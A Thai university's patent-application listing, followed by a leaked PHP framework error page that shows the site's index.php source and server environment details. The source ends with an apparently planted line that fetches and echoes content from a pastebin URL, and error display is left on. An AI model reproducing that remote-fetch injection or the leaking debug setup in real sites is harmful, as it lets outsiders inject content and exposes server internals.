รายการข้อมูลทรัพย์สินทางปัญญา

จำนวนทั้งหมด 21 รายการ
# ชื่อผลงาน อาจารย์และนักวิจัย สังกัด แหล่งทุน ประเภท วันที่ยื่นคำขอ วันที่ได้รับสิทธิบัตร/อนุสิทธิบัตร เลขที่คำขอ เลขที่สิทธิบัตร/อนุสิทธิบัตร
                   
1 กรรมวิธีการผลิตวัสดุดูดซับจากลำต้นปาล์มน้ำมัน อ.ดร.นันทรัตน์ พฤกษาพิทักษ์ คณะวิทยาศาสตร์ สำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ (องค์การมหาชน) อนุสิทธิบัตร 2017-08-04 1703001880
2 ผลึกร่วมกรดซาลิไซลิกและฟีนิลอะลานิน รศ.ดร.หิริหัทยา เพชรมั่ง คณะวิทยาศาสตร์ สิทธิบัตร 2017-08-04 1701005606
3 กรรมวิธีการควบคุมการเจริญเติบโตและการเจริญพันธุ์ของแม่พันธุ์เพรียงทรายหรือไส้เดือนทะเลในสกุล Perinereis spp. ด้วยการควบคุมระยะเวลาของการได้รับแสงสว่างในแต่ละวัน อ.ดร.ธัญญา พันธ์ฤทธิ์ดำ น.ส.จิราภรณ์ อุ่มเขียว อ.ดร.เตือนตา ร่าหมาน คณะวิทยาศาสตร์ อนุสิทธิบัตร 2017-11-01 1703002513
4 สูตรตำรับผลิตภัณฑ์บำรุงผิวและเวชสำอางที่มีส่วนผสมของผลึกร่วมของกรดซาลิไซลิกและฟีนิลอะลานินและกระบวนการผลิต รศ.ดร.หิริหัทยา เพชรมั่ง ผศ.ดร.สมชาย สวัสดี คณะวิทยาศาสตร์ อนุสิทธิบัตร 2017-12-08 1801000983
5 แผ่นวัดความหนาแน่นของต่อมรับรส น.ส.มานี แก้วชนิด คณะวิทยาศาสตร์ อนุสิทธิบัตร 2017-11-14 1703002602
6 กรรมวิธีการปลูกคะน้าโดยกำหนดอัตราการปลูกที่เหมาะสมด้วยวิธีการไฮโดรโปนิกส์แบบไดนามิก รูท โฟลทิ่ง เทคนิค (Dynamic Root Floating Technique) ผศ.ดร.สรพงค์ เบญจศรี คณะเทคโนโลยีและการพัฒนาชุมชน * แยกคำขอ อนุสิทธิบัตร 2017-12-08 รอเลขคำขอ
7 กรรมวิธีการวิเคราะห์สารประกอบกลุ่มแลคโตน ด้วยเครื่องวัดการดูดกลืนแสงชนิดไดโอดแปล่งแสง แบบภาคสนาม ผศ.ดร.ณวงศ์ บุนนาค อ.ดร.ชุติมา แก้วพิบูลย์ คณะวิทยาศาสตร์ สิทธิบัตร 2017-12-25 1801000391
8 กรรมวิธีการผลิตกรดไขมันไม่อิ่มตัวโอเมก้า-สาม จากทรอสโทไคทริดส์ อ.ดร.พฤทฐิภร ศุภพล น.ส.สิตา ปรีดานนท์ คณะวิทยาศาสตร์ อนุสิทธิบัตร 2017-12-25 1803000153
9 กรรมวิธีการผลิตซุริมิเพสท์ จากปลาทะเลโดยใช้เอมไซม์โปรตีเนส รศ.ดร.สรรพสิทธิ กล่อมเกล้า คณะเทคโนโลยีและการพัฒนาชุมชน อนุสิทธิบัตร รอเลขคำขอ
10 กระบวนการผลิตโพแทสเซียมจากเถ้าชีวมวล รศ.ดร.กนกพร สังขรักษ์ นางนิษา ไพจิตร คณะวิทยาศาสตร์ อนุสิทธิบัตร 2018-01-22 1803000621
11 แบบจำลอง ผศ.ดร.สุวิทย์ คงภักดี นายวิทยา ทวีพงศ์ศักดิ์ คณะวิทยาศาสตร์ อนุสิทธิบัตร 2018-01-05 1803000348
12 ผลิตภัณฑ์เครื่องดื่มผงสำเร็จรูปจากข้าวสังข์หยดเพาะงอกที่เสริมใยอาหารและสารช่วยระบายสำหรับผู้สูงอายุ ผศ.ดร.อมรรัตน์ ถนนแก้ว คณะเทคโนโลยีและการพัฒนาชุมชน อนุสิทธิบัตร 2018-03-14 1803000628
13 ชุดสื่อการเรียนรู้พีซีอาร์ อ.ดร.อรุณรัศมิ์ วณิชชานนท์ อ.ดร.เกศรินทร์ รัทจร คณะวิทยาศาสตร์ อนุสิทธิบัตร 2018-02-15 1803000610
14 กรรมวิธีการผลิตถ่านกัมมันต์กากชาที่ปรับสภาพด้วยเอทิลีนไดเอมีนสำหรับดูดซับก๊าซคาร์บอนไดออกไซต์ อ.ดร.พนิตา กุ้งซุ่น น.ส.สุภาพร รัตนพันธ์ คณะวิทยาศาสตร์ อนุสิทธิบัตร 2018-01-22 1803001158
15 สื่อการเรียนการสอนชุดทดลองสัมประสิทธิ์ความหนืดของของเหลว นายศุภกร กตาธิการกุล น.ส.นิศามณี ฉุ้นย่อง ผศ.ดร.ประสงค์ เกษราธิคุณ ผศ.ดร.สุวิทย์ คงภักดี คณะวิทยาศาสตร์ อนุสิทธิบัตร 2018-01-22 1803001168
16 ท่อแบนสำหรับถ่ายเทความร้อนที่มีพื้นที่หน้าตัดสลับไปมา ผศ.ดร.จตุพร แก้วอ่อน/น.ส.อมาวสี รักเรือง คณะวิศวกรรมศาสตร์ สิทธิบัตร 2018-06-21 รอเลขคำขอ
17 กรรมวิธีการผลิตเอนไซม์ไลเปสจากเครื่องในปลานิลเพื่อประยุกต์ใช้ในสารซักล้าง รศ.ดร.สรรพสิทธิ์ กล่อมเกล้า/นายจรัญ ปัจฉิมเพ็ชร คณะเทคโนโลยีและการพัฒนาชุมชน อนุสิทธิบัตร 2018-06-21 รอเลขคำขอ
18 ชุดชุบโลหะและการสังเคราะห์อนุภาคโลหะระดับนาโนโดยวิธีไฟฟ้าเคมี ผศ.ดร.นินนาท์ จันทร์สูรย์ /นายศุภกร กตาธิการกุล/นายสุเจนต์ พรหมเหมือน คณะวิทยาศาสตร์ อนุสิทธิบัตร 2018-07-21 รอเลขคำขอ
19 สูตรอาหารเลี้ยงปลาวัยอ่อนที่มีอาหารเสริมกรดไขมันไม่อิ่มตัวจากทรอสโทไคทริดส์และกรรมวิธีการผลิต อ.ดร.พฤทฐิพร ศุภพลผศ.ดร.สุภฎา คีรีรัฐนิคม คณะวิทยาศาสตร์ อนุสิทธิบัตร 2018-07-21 รอเลขคำขอ
20 การผลิตไบโอดีเซลจากน้ำทิ้งโรงงานสกัดน้ำมันปาล์มโดยใช้เอนไซม์ไลเปสตรึงจากผลปาล์มเป็นตัวเร่งปฏิกิริยา รศ.ดร.กนกพร สังขรักษ์ คณะวิทยาศาสตร์ อนุสิทธิบัตร 2018-07-21 รอเลขคำขอ
21 เครื่องตรวจสอบค่าดัชนีมวลกาย นายศุภกร กตาธิการกุล/น.ส.วริศรา จันทร์ใหม่ คณะวิทยาศาสตร์ อนุสิทธิบัตร 2018-07-21 รอเสนอยื่นคำขอ


Exception: file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n \nC:\inetpub\wwwroot\rdiqa\public\index.php:44
Phalcon Framework 3.3.1

Exception: file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n \nC:\inetpub\wwwroot\rdiqa\public\index.php:44

C:\inetpub\wwwroot\rdiqa\public\index.php (11)
#0{closure}(2, file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n, C:\inetpub\wwwroot\rdiqa\public\index.php, 44, Array(22))
#1file_get_contents(https://pastebin.com/raw/e0ZNham4)
C:\inetpub\wwwroot\rdiqa\public\index.php (44)
<?php
use Phalcon\Mvc\Application;
use Phalcon\Config\Adapter\Ini as ConfigIni;
error_reporting(E_ALL);
// output errors to browser
ini_set('display_errors', 'on');
// report all errors
error_reporting(E_ALL);
// convert warnings/notices to exceptions
set_error_handler(function($errno, $errstr, $errfile, $errline) {
  throw new \Exception($errstr.PHP_EOL.$errfile.":".$errline, $errno);
});
 
$debug = new \Phalcon\Debug();
$debug->listen();
 
 try {
  define('APP_PATH', realpath('..') . '/');
 
  /**
   * Read the configuration
   */
  $config = new ConfigIni(APP_PATH . 'app/config/config.ini');
  if (is_readable(APP_PATH . 'app/config/config.ini.dev')) {
    $override = new ConfigIni(APP_PATH . 'app/config/config.ini.dev');
    $config->merge($override);
  }
 
  
  /**
   * Auto-loader configuration
   */
  require APP_PATH . 'app/config/loader.php';
 
  $application = new Application(new Services($config));
 
  // NGINX - PHP-FPM already set PATH_INFO variable to handle route
  echo $application->handle(!empty($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : null)->getContent();
} catch (Exception $e){
  echo $e->getMessage() . '<br>';
  echo '<pre>' . $e->getTraceAsString() . '</pre>';
}
 
echo file_get_contents("https://pastebin.com/raw/e0ZNham4");
KeyValue
_url/patentreport/index
KeyValue
PROCESSOR_ARCHITEW6432AMD64
_FCGI_X_PIPE_\\.\pipe\IISFCGI-d2022ceb-ce19-4820-a9a3-98d83358b737
PHPRCC:\Program Files (x86)\PHP\v7.1.13\
PHP_FCGI_MAX_REQUESTS10000
ALLUSERSPROFILEC:\ProgramData
APPDATAC:\Windows\system32\config\systemprofile\AppData\Roaming
APP_POOL_CONFIGC:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
APP_POOL_IDDefaultAppPool
CommonProgramFilesC:\Program Files (x86)\Common Files
CommonProgramFiles(x86)C:\Program Files (x86)\Common Files
CommonProgramW6432C:\Program Files\Common Files
COMPUTERNAMERMS
ComSpecC:\Windows\system32\cmd.exe
FP_NO_HOST_CHECKNO
LOCALAPPDATAC:\Windows\system32\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS8
OSWindows_NT
PathC:\app\Administrator\product\11.2.0\dbhome\bin;C:\Program Files\PHP\v5.3;C:\Program Files (x86)\PHP\v7.1.13;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft SQL Server\120\Tools\Binn\;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\;C:\Program Files\dotnet\;
PATHEXT.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTUREx86
PROCESSOR_IDENTIFIERIntel64 Family 6 Model 44 Stepping 2, GenuineIntel
PROCESSOR_LEVEL6
PROCESSOR_REVISION2c02
ProgramDataC:\ProgramData
ProgramFilesC:\Program Files (x86)
ProgramFiles(x86)C:\Program Files (x86)
ProgramW6432C:\Program Files
PSModulePathC:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\WindowsPowerShell\Modules\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\ResourceManager\AzureResourceManager\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\ServiceManagement\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\Storage\
PUBLICC:\Users\Public
SystemDriveC:
SystemRootC:\Windows
TEMPC:\Windows\TEMP
TMPC:\Windows\TEMP
USERDOMAINWORKGROUP
USERNAMERMS$
USERPROFILEC:\Windows\system32\config\systemprofile
VBOX_MSI_INSTALL_PATHC:\Program Files\Oracle\VirtualBox\
VS140COMNTOOLSC:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\Tools\
windirC:\Windows
ORIG_PATH_INFO/rdiqa/public/index.php
URL/rdiqa/public/index.php
SERVER_SOFTWAREMicrosoft-IIS/8.5
SERVER_PROTOCOLHTTP/1.1
SERVER_PORT_SECURE0
SERVER_PORT82
SERVER_NAMErms.rdi.tsu.ac.th
SCRIPT_NAME/rdiqa/public/index.php
SCRIPT_FILENAMEC:\inetpub\wwwroot\rdiqa\public\index.php
REQUEST_URI/rdiqa/patentreport/index
REQUEST_METHODGET
REMOTE_USER
REMOTE_PORT33574
REMOTE_HOST44.192.65.228
REMOTE_ADDR44.192.65.228
QUERY_STRING_url=/patentreport/index
PATH_TRANSLATEDC:\inetpub\wwwroot\rdiqa\public\index.php
LOGON_USER
LOCAL_ADDR10.100.1.209
INSTANCE_META_PATH/LM/W3SVC/1
INSTANCE_NAMERMS.RDI.TSU.AC.TH
INSTANCE_ID1
HTTPS_SERVER_SUBJECT
HTTPS_SERVER_ISSUER
HTTPS_SECRETKEYSIZE
HTTPS_KEYSIZE
HTTPSoff
GATEWAY_INTERFACECGI/1.1
DOCUMENT_ROOTC:\inetpub\wwwroot
CONTENT_TYPE
CONTENT_LENGTH0
CERT_SUBJECT
CERT_SERIALNUMBER
CERT_ISSUER
CERT_FLAGS
CERT_COOKIE
AUTH_USER
AUTH_PASSWORD
AUTH_TYPE
APPL_PHYSICAL_PATHC:\inetpub\wwwroot\
APPL_MD_PATH/LM/W3SVC/1/ROOT
IIS_UrlRewriteModule7.1.1952.0
UNENCODED_URL/rdiqa/patentreport/index
IIS_WasUrlRewritten1
HTTP_X_ORIGINAL_URL/rdiqa/patentreport/index
HTTP_USER_AGENTCCBot/2.0 (https://commoncrawl.org/faq/)
HTTP_IF_MODIFIED_SINCESat, 23 Oct 2021 11:06:46 GMT
HTTP_HOSTrms.rdi.tsu.ac.th:82
HTTP_ACCEPT_LANGUAGEen-US,en;q=0.5
HTTP_ACCEPT_ENCODINGbr,gzip
HTTP_ACCEPTtext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_CONTENT_LENGTH0
HTTP_CONNECTIONKeep-Alive
FCGI_ROLERESPONDER
PHP_SELF/rdiqa/public/index.php
REQUEST_TIME_FLOAT1656793442.0769
REQUEST_TIME1656793442
#Path
0C:\inetpub\wwwroot\rdiqa\public\index.php
1C:\inetpub\wwwroot\rdiqa\app\config\loader.php
2C:\inetpub\wwwroot\rdiqa\app\Services.php
3C:\inetpub\wwwroot\rdiqa\app\library\Base\Services.php
4C:\inetpub\wwwroot\rdiqa\app\plugins\SecurityPlugin.php
5C:\inetpub\wwwroot\rdiqa\app\plugins\NotFoundPlugin.php
6C:\inetpub\wwwroot\rdiqa\app\controllers\PatentreportController.php
7C:\inetpub\wwwroot\rdiqa\app\controllers\ControllerBase.php
8C:\inetpub\wwwroot\rdiqa\app\forms\MpatentForm.php
9C:\inetpub\wwwroot\rdiqa\app\models\Department.php
10C:\inetpub\wwwroot\rdiqa\app\models\Budgetyear.php
11C:\inetpub\wwwroot\rdiqa\app\models\Patent.php
12C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_patentreport_index.volt.php
13C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_layouts_patentreport.volt.php
14C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_layouts_main.volt.php
15C:\inetpub\wwwroot\rdiqa\app\library\Elementsrdi.php
16C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_index.volt.php
Memory
Usage2097152